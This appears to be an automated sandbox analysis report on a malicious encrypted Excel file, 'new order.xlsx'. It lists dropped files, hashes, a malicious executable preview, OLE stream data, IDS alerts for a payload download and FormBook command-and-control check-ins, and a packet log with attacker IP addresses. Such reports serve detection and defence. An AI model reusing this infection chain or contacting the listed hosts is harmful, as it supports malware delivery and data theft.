                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F7C9E9A.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97389FAC.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F241D1B.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7608
                                                                                                                                                  Entropy (8bit):5.073078686684614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+SO51L6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5KjU+H3tWa6WdTfOYLpR8d
                                                                                                                                                  MD5:38F8AEF1B9B013E0B0068166B63A0E43
                                                                                                                                                  SHA1:A4DCB11C764BF5B40EE117A372735B2AFA0B55F7
                                                                                                                                                  SHA-256:6668AA81E5E7F205C8CD14960B057A1E3FE04D9591DC11157B3A652CA12EC34E
                                                                                                                                                  SHA-512:C7B6120132E3A8D0AA8C730283E8E695D770D2E740B7535AFEDE9E94E47F9431F12FBCDDB6A3BEBEE90A89E3DA30F31FC375B95EA822157CA71FD6501250550D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................}.6.).X.......d...................D..........p....\...D.......D..........p....D....6Pv...p....`..p.%}.$y.v.t|.........h......v..|.$.......d............^.p.....^.p.t|..t|........-........<.v................<.>v.Z.v....X..o.....%}........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D44E50E1.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D54AA3BD.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E22CC16E.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\Desktop\~$new order.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):721408
                                                                                                                                                  Entropy (8bit):7.749166309747153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:8xQ/7SxjdzTy44OiFTH/xar1sFrnRQPjiN4/3fhAjxDRHEiloRyp:8xQmfy44jtxxFtUjq4/pMxDJ
                                                                                                                                                  MD5:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  SHA1:2D925D1D04D12C72E4411D84B2C2B297D09F2C3C
                                                                                                                                                  SHA-256:994F99037072FBEA77A376832818FEC2BDAF577A09B1936A7285E38ACE5D8E4F
                                                                                                                                                  SHA-512:087D25C798E2429B34B408FF0A315018A46FEB833D5286AB87835B5B2E49FD7B3079FACF5BE7CE44EC5E5869F2390AB50066DFDAAAE7F638C0F9D427B919162F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..`..............P.................. ... ....@.. .......................`............@.................................<...O.... ..X....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc.......@......................@..B................p.......H.......X....&...........................................................O.z....T....N..~/...-...u..JF.y?..E\.!.<._...|.dI..6.....\..<...j.......9....#`..U.E.....b........u..p...F.+..lq..).E=m....2...m.'.8/.dk.......Y.J.f..l...h.N.v.9B.*.........5%.kOUAK.......^...c0V...0.D.......................S........k1..c_.'T..zi:.....B..r.*v.c.N.r.P..o...{....(...M.3..0|.k.}4..Ki..#.y.+T1U..~....../......{..Z..!l'.>.E.EzL..Q.=7....X.P.qft.....1.%>....^..[c(.....)..s.0...

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.994753169045867
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:new order.xlsx
                                                                                                                                                  File size:1333760
                                                                                                                                                  MD5:d59accd992813d35bb00a4b3f84c4ffe
                                                                                                                                                  SHA1:851d437a71d1a156e0adb9f553611865b8c90d94
                                                                                                                                                  SHA256:002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
                                                                                                                                                  SHA512:7328ce416225e682b4b3f2c5c81427195144f3b030264d4a6dde967092b26165769bb87718843db8de6d56a6d1da3c8a2eb929f73b1c9720db3ca17a5fefad14
                                                                                                                                                  SSDEEP:24576:beO5efoW4hdgaEwAq4P1opC4O64Qgawpf0kkwgAEfH75:hFW4sasq4PONP4QoN7za75
                                                                                                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "new order.xlsx"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:64
                                                                                                                                                  Entropy:2.73637206947
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:112
                                                                                                                                                  Entropy:2.7597816111
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.13335930328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/Version
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:76
                                                                                                                                                  Entropy:2.79079600998
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1318984
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptedPackage
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1318984
                                                                                                                                                  Entropy:7.99890686533
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:4 . . . . . . . } . H . . . Y . . i . K . . ) _ . . . . . . . . ] . V M . . . . Y . . } . 4 v . _ . . ; . : c . # . ( . . _ e . . } . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z
                                                                                                                                                  Data Raw:34 20 14 00 00 00 00 00 fd 7d 8b 48 d2 b1 ca 59 15 f6 69 e8 4b e4 f2 29 5f f5 d4 f6 b7 19 e9 c6 17 5d 01 56 4d 19 01 8c ef 59 d0 8a 7d c9 34 76 9d 5f 06 e1 3b b9 3a 63 f2 23 19 28 98 1e 5f 65 a4 a9 7d ea 91 8a ad 8c c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a
                                                                                                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptionInfo
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:224
                                                                                                                                                  Entropy:4.52655354693
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . H . . . . . . = . . F . . 2 _ . t * . . . @ v % . ' . { h 7 . . . . . . # . s . . q . . . . c X . Y . . o . 7 V . . . . . n P s . 4 e
                                                                                                                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  07/22/21-17:11:01.858671TCP2019696ET TROJAN Possible MalDoc Payload Download Nov 11 20144916780192.168.2.22103.155.80.130
                                                                                                                                                  07/22/21-17:12:26.881021TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                                                                                                                  07/22/21-17:12:26.881021TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                                                                                                                  07/22/21-17:12:26.881021TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                                                                                                                  07/22/21-17:12:27.021442TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:11:01.531136990 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:01.857800007 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:01.857975960 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:01.858670950 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.188283920 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188322067 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188349009 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188378096 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188388109 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.188409090 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.188417912 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.514086962 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.515700102 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.515753031 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.515809059 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.517229080 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.517246008 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.517287970 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.518718004 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518737078 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518740892 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518743038 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518745899 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518748999 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518750906 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518814087 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.520396948 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848548889 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848587990 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848612070 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848634958 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848655939 CEST4916780192.168.2.22103.155.80.130
